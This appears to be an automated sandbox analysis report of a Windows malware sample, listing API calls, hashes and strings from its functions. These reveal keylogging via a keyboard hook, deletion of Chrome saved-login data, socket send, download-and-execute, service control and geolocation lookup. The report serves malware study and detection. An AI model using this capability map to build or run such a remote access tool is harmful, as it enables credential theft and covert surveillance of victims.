                          • Opcode ID: 4b14aa1bc7189600b3df2c7baed1fce7e981b9bf703063a35819cb8b8327a43d
                          • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                          • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                          APIs
                          • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00471E78,?), ref: 0041A076
                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00471E78,?), ref: 0041A0A6
                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00471E78,?), ref: 0041A118
                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A125
                            • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00471E78,?), ref: 0041A0FB
                          • GetLastError.KERNEL32(?,?,?,?,?,00471E78,?), ref: 0041A146
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A15C
                          • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A163
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,00471E78,?), ref: 0041A16C
                          Similarity
                          • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                          • String ID:
                          • API String ID: 2341273852-0
                          • Opcode ID: 2253f20c687efd1695f59cc813ac36ef13daa749edc7cb4b9e2c9040a42a2537
                          • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                          • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                          APIs
                            • Part of subcall function 00410201: SetLastError.KERNEL32(0000000D,00410781,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 00410207
                          • SetLastError.KERNEL32(000000C1,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041079C
                          • GetNativeSystemInfo.KERNEL32(?,?,00000000,$.F,?,?,?,?,?,?,?,?,?,?,?,0041075F), ref: 0041080A
                          • SetLastError.KERNEL32(0000000E), ref: 0041082E
                            • Part of subcall function 00410708: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,0041084C,?,00000000,00003000,00000004,00000000), ref: 00410718
                          • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00410875
                          • HeapAlloc.KERNEL32(00000000), ref: 0041087C
                          • SetLastError.KERNEL32(0000045A), ref: 0041098F
                            • Part of subcall function 00410ADC: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,0041099C), ref: 00410B4C
                            • Part of subcall function 00410ADC: HeapFree.KERNEL32(00000000), ref: 00410B53
                          Similarity
                          • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                          • String ID: $.F
                          • API String ID: 3950776272-1421728423
                          • Opcode ID: afa6d71e2a3b14814050e18c4da3df367c89416f336fbbd417f722f4d15fa1ad
                          • Instruction ID: 59628d97446cb481dba570c2b442d682f024dd9dc2812234181a156a821a4c1f
                          • Instruction Fuzzy Hash: F7619270200211ABD750AF66CD91BAB7BA5BF44714F54412AF9158B382DBFCE8C1CBD9
                          APIs
                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                          • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                          • GetLastError.KERNEL32 ref: 00409375
                            • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                          • TranslateMessage.USER32(?), ref: 004093D2
                          • DispatchMessageA.USER32(?), ref: 004093DD
                          Strings
                          • Keylogger initialization failure: error , xrefs: 00409389
                          Similarity
                          • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                          • String ID: Keylogger initialization failure: error
                          • API String ID: 3219506041-952744263
                          • Opcode ID: 4daa718d81045fd2d4cd741a07fca7de2266515ef5ec0dc15ecea471e6442c9d
                          • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                          • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                          APIs
                          • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                          • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                          Similarity
                          • API ID: AddressCloseCreateLibraryLoadProcsend
                          • String ID: SHDeleteKeyW$Shlwapi.dll
                          • API String ID: 2127411465-314212984
                          • Opcode ID: 3a8f36ea34958f1437b96a761794d04628548da7921348726e3bd1b1d4fd3bc5
                          • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                          • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                          APIs
                          • _free.LIBCMT ref: 00446741
                          • _free.LIBCMT ref: 00446765
                          • _free.LIBCMT ref: 004468EC
                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                          • _free.LIBCMT ref: 00446AB8
                          Similarity
                          • API ID: _free$ByteCharMultiWide$InformationTimeZone
                          • String ID:
                          • API String ID: 314583886-0
                          • Opcode ID: cbe724d584c4c688f7c92c89d2af3aac564bebe5498eb7e7b8226ac0d6f42e00
                          • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                          • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                          APIs
                            • Part of subcall function 00411F34: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00411F54
                            • Part of subcall function 00411F34: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,00000000), ref: 00411F72
                            • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                          • Sleep.KERNEL32(00000BB8), ref: 0040E243
                          • ExitProcess.KERNEL32 ref: 0040E2B4
                          Similarity
                          • API ID: CloseExitOpenProcessQuerySleepValue
                          • String ID: 3.8.0 Pro$override$pth_unenc$!G
                          • API String ID: 2281282204-1386060931
                          • Opcode ID: 2411e5703e7239f679d30a90bad3a95645d2e36138ee9f8a514be94ac54cb995
                          • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                          • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF
                          APIs
                          • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00419392
                          • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 004193A8
                          • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 004193C1
                          • InternetCloseHandle.WININET(00000000), ref: 00419407
                          • InternetCloseHandle.WININET(00000000), ref: 0041940A
                          Strings
                          • http://geoplugin.net/json.gp, xrefs: 004193A2
                          Similarity
                          • API ID: Internet$CloseHandleOpen$FileRead
                          • String ID: http://geoplugin.net/json.gp
                          • API String ID: 3121278467-91888290
                          • Opcode ID: ef2ec91d27aa09046ea65f67fa3d050ef1f1622cef503f288a816c5549269c7a
                          • Instruction ID: 9fad89c028030122b1819b6a874fefb9d729214f45c39af6bed7b2b06c6e4f32
                          • Instruction Fuzzy Hash: 3311C8311053126BD224EF169C59DABBF9CEF85765F40053EF905A32C1DBA8DC44C6A9
                          APIs
                          • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040A98F
                          • GetLastError.KERNEL32 ref: 0040A999
                          Strings
                          • UserProfile, xrefs: 0040A95F
                          • [Chrome StoredLogins found, cleared!], xrefs: 0040A9BF
                          • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040A95A
                          • [Chrome StoredLogins not found], xrefs: 0040A9B3
                          Similarity
                          • API ID: DeleteErrorFileLast
                          • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          • API String ID: 2018770650-1062637481
                          • Opcode ID: c755599410c6c02e55073cedb3b03e5beee3eb12ab5711b2b25ec6cbfe43ec22
                          • Instruction ID: b2134abed7c3f614b53a5a28bf05479c5c2a11b403a78876888f6ce5fd1f590e
                          • Instruction Fuzzy Hash: 7801F271B9020466CA047A75DC2B8BE7728A921304B90057FF402732E2FE7D8A1586CF
                          APIs
                          • __EH_prolog.LIBCMT ref: 00408393
                            • Part of subcall function 004048A8: connect.WS2_32(?,?,?), ref: 004048C0
                            • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040842F
                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040848D
                          • FindNextFileW.KERNEL32(00000000,?), ref: 004084E5
                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 004084FC
                            • Part of subcall function 00404E06: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                            • Part of subcall function 00404E06: SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                            • Part of subcall function 00404E06: CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                          • FindClose.KERNEL32(00000000), ref: 004086F4
                            • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,00401A25,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000), ref: 00404B27
                            • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473A38,00471E78,00000000,?,?,?,?,?,00401A25), ref: 00404B55
                          Similarity
                          • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                          • String ID:
                          • API String ID: 1824512719-0
                          • Opcode ID: fe1b7685708ab651bcf0735ee0d7b313b9460d78bb97c14bdd2e97ece23dd4dd
                          • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                          • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                          APIs
                          • GetForegroundWindow.USER32 ref: 0040949C
                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 004094A7
                          • GetKeyboardLayout.USER32(00000000), ref: 004094AE
                          • GetKeyState.USER32(00000010), ref: 004094B8
                          • GetKeyboardState.USER32(?), ref: 004094C5
                          • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 004094E1
                          Similarity
                          • API ID: KeyboardStateWindow$ForegroundLayoutProcessThreadUnicode
                          • String ID:
                          • API String ID: 3566172867-0
                          • Opcode ID: d901ee0ac73cdc62f5a306cfd6c81765c1cc2556515ef31437eb64726968fe5d
                          • Instruction ID: c7d3d650b917c490fc12d3d20248521073b1bf92526e1b13c177c4272b1ff9cc
                          • Instruction Fuzzy Hash: B9111E7290020CABDB10DBE4EC49FDA7BBCEB4C706F510465FA08E7191E675EA548BA4
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,00418656,00000000), ref: 00418A09
                          • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,00418656,00000000), ref: 00418A1E
                          • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A2B
                          • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,00418656,00000000), ref: 00418A36
                          • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A48
                          • CloseServiceHandle.ADVAPI32(00000000,?,00418656,00000000), ref: 00418A4B
                          Similarity
                          • API ID: Service$CloseHandle$Open$ManagerStart
                          • String ID:
                          • API String ID: 276877138-0
                          • Opcode ID: 3fc945a915b8368a843192f93137a5e178334297252c2274446b31ee589ae89c
                          • Instruction ID: d7e7041197745ae6b8576ac0eea0d71e7d0897d816d6b6e74118e31fa9ec717f
                          • Instruction Fuzzy Hash: CAF082711012246FD211EB65EC89DBF2BACDF85BA6B41042BF801931918F78CD49A9B9
                          APIs
                          • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                          • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                            • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                          Similarity
                          • API ID: File$Find$CreateFirstNext
                          • String ID: H"G$`'G$`'G
                          • API String ID: 341183262-2774397156
                          • Opcode ID: 753b25ef91f62c10a23852cd7e303c3a05920bb6bbf3c128c8b3a0c8982e454a
                          • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                          • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                          APIs
                          • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6B5
                          • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0044F93B,?,00000000), ref: 0044F6DE
                          • GetACP.KERNEL32(?,?,0044F93B,?,00000000), ref: 0044F6F3
                          Similarity
                          • API ID: InfoLocale
                          • String ID: ACP$OCP
                          • API String ID: 2299586839-711371036
                          • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                          • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                          • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                          APIs
                          • GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
                          • wsprintfW.USER32 ref: 0040A13F
                            • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,00000000,0040A156,00000000), ref: 0040965A
                          Similarity
                          • API ID: EventLocalTimewsprintf
                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                          • API String ID: 1497725170-248792730
                          • Opcode ID: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                          • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                          • Opcode Fuzzy Hash: 87b5f94750da63fef2f6cded4e82116a79e8327da2086fd1d9a035c3abd0ab33
                          • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                          APIs
                          • FindResourceA.KERNEL32(SETTINGS,0000000A), ref: 004194A4
                          • LoadResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194B8
                          • LockResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194BF
                          • SizeofResource.KERNEL32(00000000,?,?,?,0040DD9E), ref: 004194CE
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Resource$FindLoadLockSizeof
                          • String ID: SETTINGS
                          • API String ID: 3473537107-594951305
                          • Opcode ID: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                          • Instruction ID: a9e8191b24fee58836060ebd07e0bd7776b83e69f4e337d8cda710b4f32c44fb
                          • Opcode Fuzzy Hash: 7f61ee72686a272b8f551de58b86ae3e218e906a9fde472ee07ff8038d16bca4
                          • Instruction Fuzzy Hash: 72E01A76200710ABCB211FA1FC5CD273E69F799B537050035FA0183222DA75CC00CA19
                          APIs
                          • __EH_prolog.LIBCMT ref: 004087A5
                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                          • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstH_prologNext
                          • String ID:
                          • API String ID: 1157919129-0
                          • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                          • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                          • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                          • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                            • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0044F8FC
                          • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                          • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                          • GetLocaleInfoW.KERNEL32(?,00001001,00441F7E,00000040,?,0044209E,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                          • GetLocaleInfoW.KERNEL32(?,00001002,00441FFE,00000040), ref: 0044F9CD
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                          • String ID:
                          • API String ID: 745075371-0
                          • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                          • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                          • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                          • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                          APIs
                          • __EH_prolog.LIBCMT ref: 0040784D
                          • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                          • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                          • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                          • String ID:
                          • API String ID: 1771804793-0
                          • Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                          • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                          • Opcode Fuzzy Hash: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
                          • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                          APIs
                            • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040E305
                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040E329
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E338
                          • CloseHandle.KERNEL32(00000000), ref: 0040E4EF
                            • Part of subcall function 00419F51: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040DFB9,00000000,?,?,00000001), ref: 00419F66
                            • Part of subcall function 00419F87: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 00419F9C
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E4E0
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProcessProcess32$NextOpen$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                          • String ID:
                          • API String ID: 1735047541-0
                          • Opcode ID: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                          • Instruction ID: 9ef93eb2fb75da2762b4731e21c5b8dc01158be40bd3d18dbb98703d8f1b3e60
                          • Opcode Fuzzy Hash: 6f438c647af3f64ff81423d8645069480e61c42badef12e757d9f04d87e397aa
                          • Instruction Fuzzy Hash: 904101311082415BC365F761D991EEFB3A8AFD4344F50493EF48A921E2EF38994AC75A
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: A%E$A%E
                          • API String ID: 0-137320553
                          • Opcode ID: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                          • Instruction ID: 1c47d48333aa2aee23a91f6ecd96940ee01f0d1a5fc0d697d822b355cdd05c70
                          • Opcode Fuzzy Hash: 4196e068c390569144ba97144776be62b0eb254e97c7fe9274842686a6009a67
                          • Instruction Fuzzy Hash: C4022E71E002199BEF14CFA9C8806AEF7F1EF88715F25816AE819E7341D735AE45CB84
                          APIs
                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                            • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                            • Part of subcall function 0041215F: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00412385,?,00000000), ref: 00412196
                            • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,?,00412385,?,00000000), ref: 004121A1
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateInfoParametersSystemValue
                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                          • API String ID: 4127273184-3576401099
                          • Opcode ID: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                          • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                          • Opcode Fuzzy Hash: 5150ba5cc6bca268b63238cec6e219cc56e1651da33e9e1a7eed9394c1e9f3e3
                          • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                          APIs
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004064D2
                          • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004065B6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: DownloadExecuteFileShell
                          • String ID: open
                          • API String ID: 2825088817-2758837156
                          • Opcode ID: 400a122d183a9112cc7a0cd06a1688c26b37542af8c87b61aae9a43f761ae058
                          • Instruction ID: de45ecf938be0b84f02b1b366aeabb591a3e89dbb22835c7232af05a142efef6
                          • Opcode Fuzzy Hash: 400a122d183a9112cc7a0cd06a1688c26b37542af8c87b61aae9a43f761ae058
                          • Instruction Fuzzy Hash: 6F61D331A0430167CA14FB75D8A697E77A99F81708F00093FFD42772D6EE3D8A09869B
                          APIs
                            • Part of subcall function 00445725: GetLastError.KERNEL32(?,0043EE9A,00438595,0043EE9A,00471E90,?,0043CC1A,FF8BC35D,00471E90,00471E90), ref: 00445729
                            • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 0044579D
                            • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                            • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                            • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,FF8BC35D,00471E90,00471E90), ref: 00445791
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F2F7
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F348
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044F408
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorInfoLastLocale$_free$_abort
                          • String ID:
                          • API String ID: 2829624132-0
                          • Opcode ID: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                          • Instruction ID: 12c224c4da0c85949021a4ccaa6d586ab513ef91610cb16151a2099a543b2454
                          • Opcode Fuzzy Hash: 5d155598132bf3b03d9715496123f76655355fd2299683488a64446915391091
                          • Instruction Fuzzy Hash: 49617D71600207ABEB289F25CC82B7B77A8EF14314F1041BBED06C6685EB78D949DB58
                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 004399A4
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 004399AE
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 004399BB
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                          • Instruction ID: 77e6618fa9d19f9c50586940e2a7469f5a9d54f298177c93e0bbf68cc30459b4
                          • Opcode Fuzzy Hash: a2edd11b745fd0db19ae8b75a4dca2fd63e5a3b0d4ecfa6da1b026d4ab375051
                          • Instruction Fuzzy Hash: 1D31D67591122C9BCB21DF65D9897CDB7B8BF08310F5051EAE40CA72A1E7749F858F48
                          APIs
                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,00000000), ref: 004315FE
                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                          Memory Dump Source
                          • Source File: 0000000F.00000002.1362638099.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_400000_RTdozXra.jbxd
                          Yara matches
                          Similarity
                          • API ID: Crypt$Context$AcquireRandomRelease
                          • String ID:
